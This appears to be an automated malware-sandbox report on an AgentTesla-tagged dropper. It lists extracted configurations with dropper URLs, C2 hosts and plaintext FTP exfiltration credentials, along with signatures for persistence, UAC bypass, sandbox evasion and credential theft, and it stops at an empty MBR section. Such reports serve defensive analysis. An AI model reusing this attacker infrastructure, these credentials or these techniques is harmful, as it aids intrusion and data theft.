agenttesla | 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc

Resubmissions

09-04-2024 13:27

240409-qqa5hsbd5t 10

09-04-2024 13:27

09-04-2024 13:27

09-04-2024 13:27

18-11-2023 14:44

Analysis

max time kernel
808s
max time network
877s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
09-04-2024 13:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe

Extracted

Family

redline

Botnet

6077866846

https://pastebin.com/raw/KE5Mft0T

Extracted

Family

xworm

94.156.8.213:58002

127.0.0.1:18356

t-brave.gl.at.ply.gg:18356

Attributes

Install_directory
%Public%
install_file
svchost.exe

Extracted

Family

remcos

Botnet

RemoteHost

shgoini.com:30902

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-7XHN5V
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.siscop.com.co
Port:
21
Username:
[email protected]
Password:
+5s48Ia2&-(t

Extracted

Family

redline

Botnet

50502

2.58.56.216:38382

Extracted

Family

socks5systemz

http://cebzkuk.net/search/?q=67e28dd86f58a021415baa1e7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978a471ea771795af8e05c645db22f31dfe339426fa12a466c553adb719a9577e55b8603e983a608ffd17c9ec9c9332

http://cebzkuk.net/search/?q=67e28dd86f58a021415baa1e7c27d78406abdd88be4b12eab517aa5c96bd86e897844c885a8bbc896c58e713bc90c91a36b5281fc235a925ed3e07d6bd974a95129070b616e96cc92be510b866db51b9e34eed4c2b14a82966836f23d7f210c7ee979c32ce669f1f

http://faddyry.ru/search/?q=67e28dd86f58a021415baa1e7c27d78406abdd88be4b12eab517aa5c96bd86e897844c885a8bbc896c58e713bc90c91a36b5281fc235a925ed3e07d6bd974a95129070b616e96cc92be510b866db51b9e34eed4c2b14a82966836f23d7f210c7ee979c32ce669f1f

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

DcRat 38 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeNew Text Document.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepowershell.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3912	schtasks.exe
5276	schtasks.exe
5604	schtasks.exe
3892	schtasks.exe
2296	schtasks.exe
5084	schtasks.exe
2036	schtasks.exe
1424	schtasks.exe
3164	schtasks.exe
3416	schtasks.exe
3020	schtasks.exe
3756	schtasks.exe
5780	schtasks.exe
4244	schtasks.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\SystemCertificates\Root	New Text Document.exe
5560	schtasks.exe
928	schtasks.exe
288	schtasks.exe
4740	schtasks.exe
3600	schtasks.exe
1724	schtasks.exe
3328	schtasks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker2 = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker2.exe"	powershell.exe
2944	schtasks.exe
2912	schtasks.exe
3016	schtasks.exe
648	schtasks.exe
4192	schtasks.exe
6064	schtasks.exe
6296	schtasks.exe
2660	schtasks.exe
5160	schtasks.exe
5460	schtasks.exe
6316	schtasks.exe
5780	schtasks.exe
5764	schtasks.exe
5452	schtasks.exe
5700	schtasks.exe

Detect Xworm Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe	family_xworm
behavioral4/memory/5040-231-0x00000000002B0000-0x00000000002C6000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe	family_xworm
behavioral4/memory/2876-329-0x0000000000080000-0x0000000000096000-memory.dmp	family_xworm

Detect ZGRat V1 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\a\afile.exe	family_zgrat_v1

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

nds.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\ProgramData\\Samsung\\svdhost.exe\",\"C:\\Users\\Admin\\AppData\\Roaming\\Fsdisk\\Moderax\\svdhost.exe\",\"C:\\Users\\Admin\\AppData\\Roaming\\Alexa\\Virtual\\hostcls.exe\""	nds.exe

Process spawned unexpected child process 24 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5700	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3756	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5452	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5780	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3164	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2660	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	288	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6064	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3892	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5764	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3912	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4244	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5160	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5780	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	648	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5560	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2912	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5084	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5460	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2944	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	4288	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5604	4288	schtasks.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe	family_quasar
C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

Processes:

resource	yara_rule
behavioral4/memory/1560-61-0x00000000014D0000-0x00000000014F2000-memory.dmp	family_redline
behavioral4/memory/2688-422-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\a\new1.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\a\redlinepanel.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\a\RDX.exe	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

garits.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	garits.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe	dcrat
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\agentDllDhcp.exe	dcrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

sarra.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sarra.exe
Renames multiple (152) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

67 3368 powershell.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	sarra.exe

flow	pid	process
67	3368	powershell.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\Locker.exe	net_reactor

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sarra.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sarra.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sarra.exe

Drops startup file 12 IoCs

Processes:

powershell.exePowershell.exeinstallutil.exeexcel.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\garits.exe	Powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2dwebzEEf4QWc73463fEVhxO.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TJ4DQ1mzPZ9rc2iQtiyu9VPk.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KWekQi4GW8jSX9FM3qfC8PxZ.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cqfp7l6axlVRIQizU8PlZP5r.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wcMDgfsxFfYZUi9qEBIFfpFN.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\excel.vbs	excel.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\garits.exe	Powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9Al1RQonlD1aWt2SrXixYxpl.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nHsa3xS83TOGaxmYrWy8WjZn.bat	installutil.exe

Executes dropped EXE 64 IoCs

Processes:

klounada.exewininit.execccc.execrypted6077866846MVYQY.exei1gcbW1E.exedisable-defender.exe1234.exeISetup8.exetest2.exe1111.exeu2oo.0.exeISetup2.exeTester.exesvchost.exeu2oo.1.exeexcel.exe555.exeDocument.exeBrawlB0t.exemedcallaboratory5.exePrintSpoofer.exeAdobe_update.exeRetailer_prog.exeBroomSetup.exealexxxxxxxx.exesyncUpd.exeLedger-Live.exenew1.exeswiiii.exeISetup5.exemstsc.exeTraffic.exepropro.execrypted_097f1784.exeu33k.0.exejune.exejune.tmpJufrxnb.exeu33k.1.execrypted_33cb9091.exesunvox32.exeJufrxnb.exesunvox32.exeJufrxnb.exeRuntimeBroker2.exeJufrxnb.exenew.exesvchost.exettt01.exeDocument.exeDocument.exe123p.exeIjerkOff.exeISetup1.exemsdtc.exeu4j0.0.exeu4j0.1.exediufhloadme.exeagentDllDhcp.exedckuybanmlgp.exeghhjhjhsg.execrypt.exemsdtc.exemsdtc.exe

pid	process
1584	klounada.exe
2532	wininit.exe
1524	cccc.exe
1560	crypted6077866846MVYQY.exe
3652	i1gcbW1E.exe
4976	disable-defender.exe
4760	1234.exe
3480	ISetup8.exe
3380	test2.exe
1912	1111.exe
1472	u2oo.0.exe
1676	ISetup2.exe
1768	Tester.exe
5040	svchost.exe
1548	u2oo.1.exe
3444	excel.exe
2260	555.exe
4920	Document.exe
2876	BrawlB0t.exe
4628	medcallaboratory5.exe
1772	PrintSpoofer.exe
3340	Adobe_update.exe
2336	Retailer_prog.exe
712	BroomSetup.exe
2108	alexxxxxxxx.exe
4932	syncUpd.exe
4796	Ledger-Live.exe
1632	new1.exe
4528	swiiii.exe
4016	ISetup5.exe
2092	mstsc.exe
3408	Traffic.exe
4712	propro.exe
5212	crypted_097f1784.exe
5324	u33k.0.exe
5676	june.exe
5784	june.tmp
5804	Jufrxnb.exe
5852	u33k.1.exe
6132	crypted_33cb9091.exe
5316	sunvox32.exe
5432	Jufrxnb.exe
5592	sunvox32.exe
2752	Jufrxnb.exe
384	RuntimeBroker2.exe
5852	Jufrxnb.exe
5884	new.exe
5500	svchost.exe
4248	ttt01.exe
788	Document.exe
3244	Document.exe
3296	123p.exe
2880	IjerkOff.exe
5868	ISetup1.exe
5660	msdtc.exe
5748	u4j0.0.exe
6016	u4j0.1.exe
2180	diufhloadme.exe
6112	agentDllDhcp.exe
1916	dckuybanmlgp.exe
3592	ghhjhjhsg.exe
1908	crypt.exe
3084	msdtc.exe
5756	msdtc.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

sarra.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Wine sarra.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Wine	sarra.exe

Loads dropped DLL 21 IoCs

Processes:

june.tmpRegAsm.exends.exe

pid	process
5784	june.tmp
4104	RegAsm.exe
4104	RegAsm.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe
4936	nds.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe	themida

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\wr.exe	upx

Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 45.155.250.90
Destination IP 45.155.250.90
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

description	ioc
Destination IP	45.155.250.90
Destination IP	45.155.250.90

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\klounada.exe	vmprotect
behavioral4/memory/1584-15-0x00000000003E0000-0x0000000000CCE000-memory.dmp	vmprotect
behavioral4/memory/1584-14-0x00000000003E0000-0x0000000000CCE000-memory.dmp	vmprotect
behavioral4/memory/1584-17-0x00000000003E0000-0x0000000000CCE000-memory.dmp	vmprotect

Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs

collection

Email Collection

T1114

Processes:

RuntimeBroker2.exe

description	ioc	process
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key opened	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key opened	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key opened	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key opened	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key opened	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key opened	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key opened	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook	RuntimeBroker2.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exepowershell.exeLocker.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker2 = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker2.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker2 = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker2.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows\CurrentVersion\Run\AlertaRansom = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\Locker.exe -alerta"	Locker.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Jufrxnb.exeexplorer.exe

description	ioc	process
File opened (read-only)	\??\Z:	Jufrxnb.exe
File opened (read-only)	\??\E:	Jufrxnb.exe
File opened (read-only)	\??\K:	Jufrxnb.exe
File opened (read-only)	\??\L:	Jufrxnb.exe
File opened (read-only)	\??\P:	Jufrxnb.exe
File opened (read-only)	\??\Y:	Jufrxnb.exe
File opened (read-only)	\??\H:	Jufrxnb.exe
File opened (read-only)	\??\M:	Jufrxnb.exe
File opened (read-only)	\??\R:	Jufrxnb.exe
File opened (read-only)	\??\V:	Jufrxnb.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\B:	Jufrxnb.exe
File opened (read-only)	\??\J:	Jufrxnb.exe
File opened (read-only)	\??\O:	Jufrxnb.exe
File opened (read-only)	\??\T:	Jufrxnb.exe
File opened (read-only)	\??\W:	Jufrxnb.exe
File opened (read-only)	\??\U:	Jufrxnb.exe
File opened (read-only)	\??\X:	Jufrxnb.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\G:	Jufrxnb.exe
File opened (read-only)	\??\I:	Jufrxnb.exe
File opened (read-only)	\??\N:	Jufrxnb.exe
File opened (read-only)	\??\Q:	Jufrxnb.exe
File opened (read-only)	\??\S:	Jufrxnb.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

Processes:

flow	ioc
482	pastebin.com
7	raw.githubusercontent.com
20	raw.githubusercontent.com
318	pastebin.com
261	drive.google.com
305	pastebin.com
485	pastebin.com
1	pastebin.com
26	pastebin.com
227	drive.google.com

Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

451 api.myip.com
453 ipinfo.io
1 ip-api.com
411 api.myip.com
411 ipinfo.io
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

ttt01.exeeeee.exe

description ioc process

